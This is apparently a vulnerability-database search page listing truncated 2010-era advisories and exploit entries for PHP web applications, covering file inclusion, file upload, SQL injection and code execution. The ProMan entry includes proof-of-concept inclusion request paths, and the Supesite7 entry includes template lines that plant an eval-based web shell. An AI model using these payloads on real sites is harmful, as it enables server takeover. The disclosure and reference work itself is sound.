7219 matches found
CVE-2010-1055
Multiple PHP remote file inclusion vulnerabilities in osDate 2.1.9 and 2.5.4, when magic_quotes_gpc is disabled and register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the configforuminstalled parameter to (1) forum/adminLogin.php and (2) forum/userLogin.php...
eFront 'langname' Parameter Traversal Local File Inclusion
The version of eFront running on the remote web server is affected by a local file inclusion vulnerability due to improper sanitization of user-supplied input to the 'langname' parameter of the language.php script before using it to include PHP code. Regardless of PHP's 'register_globals' setting,...
SA-CONTRIB-2010-027: Email Input Filter - Arbitrary code execution
Email Input Filter converts email style markup into web friendly format. Arbitrary code execution vulnerability in this module allows a remote attacker with the ability to create content using an input format with the email input filter enabled to execute arbitrary PHP code on an affected system...
DEDECMS v5.5 Final select_soft_post.php vulnerability
Author: st0p Today only from Wolves Security Team to see toby57 large cattle released "DEDECMS v5.5 GBK Final one. vulnerability" this article, the original address: http://bbs.wolvez.org/topic/125/ Your own local testing a bit, covering the SESSION this little chicken threat is true, because the reque...
ispCP Omega 'net2ftp_globals[application_skinsdir]' Parameter Remote File Include Vulnerability
ispCP Omega is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a...
InTerra Blog Machine <= 1.70 Shell Upload Vulnerability
Exploit for unknown platform in category web applications. InTerra Blog Machine...
CVE-2010-0755
PHP remote file inclusion vulnerability in include/WBmap.php in WikyBlog 1.7.3 rc2 allows remote attackers to execute arbitrary PHP code via a URL in the langFile parameter...
ProMan 0.1.1 - Multiple File Inclusions
ProMan Download: http://sourceforge.net/projects/pman/files/ RFI Code LFI Code includeonce'lang/'.$SESSION'userLang'.'/elisttasks.php'; if !defined'PROMAN' pexit $l'no hack'; PoC RFI: phpRAINCHECKpath/center.php?page=Shell PoC LFI: phpRAINCHECKpath/elisttasks.php?SESSIONuserLang=LFI%00...
trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection
The version of the Cisco Phone Services phone directory script 'cisco/services/PhoneDirectory.php' installed as part of the web interface for trixbox (or Asterisk@Home, as it was formerly known) and hosted on the remote web server fails to sanitize input to the 'ID' parameter before using it in a...
CVE-2010-0678
PHP remote file inclusion vulnerability in includes/moderation.php in Katalog Stron Hurricane 1.3.5, and possibly earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the includesdirectory parameter...
Scriptegrator Plugin for Joomla! 'files[]' Parameter Remote File Include
The version of the Core Design Scriptegrator plugin for Joomla! running on the remote host is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the 'files' parameter before using it in the cdscriptegrator/libraries/highslide/js/jsloader.php...
Open Flash Chart/Pwiki Remote Code Execution Vulnerability
Exploit for unknown platform in category web applications. Open Flash Chart/Pwiki Remote Code Execution Vulnerability. Author: GoLdeN-z3r0 Title: Open Flash Chart/Pwiki Remote Code...
openSUSE Security Update : horde (horde-1947)
This update of horde fixes: - CVE-2009-3236: CVSS v2 Base Score: 5.0: Overwrite arbitrary files and execute PHP code - CVE-2009-3237: CVSS v2 Base Score: 5.0: Cross-Site Scripting (XSS) - CVE-2009-3701: CVSS v2 Base Score: 4.3: Cross-Site Scripting (XSS) - CVE-2009-4363: CVSS v2 Base Score: 4.3:...
SA-CONTRIB-2010-015 - Signwriter - Arbitrary code execution
The Signwriter module allows the use of TrueType fonts to replace text in headings, blocks, menus and filtered text. This vulnerability allows a remote attacker with the ability to create content using an input filter created with a Signwriter profile to execute arbitrary PHP code on an affected...
TinyBrowser Component for Joomla! 'tinybrowser_lang' Cookie Local File Include
The version of the TinyBrowser component for Joomla! running on the remote host is affected by a local file include vulnerability due to improper sanitization of user-supplied input to the 'tinybrowser_lang' cookie before using it in the tinymce/plugins/tinybrowser/folders.php script to include PH...
Bits Video Script 2.04/2.05 - register.php Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - register.php Arbitrary File Upload / Arbitrary PHP Code Execution. source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...
Bits Video Script 2.04/2.05 - addvideo.php Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - addvideo.php Arbitrary File Upload / Arbitrary PHP Code Execution. source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...
Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution
source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...
Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution
source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...
Supesite7 the background to get shell
PHP code !-- eval $content = "@eval$POSTc";-- !-- eval $test1 = ""."?"." php ".$ content."?& gt;";-- !-- eval fputsfopenSROOT.'./ templates/default/modelcache.php','w+',$test1;-- Edit the template when writing these few lines,disassemble the written word,on the line...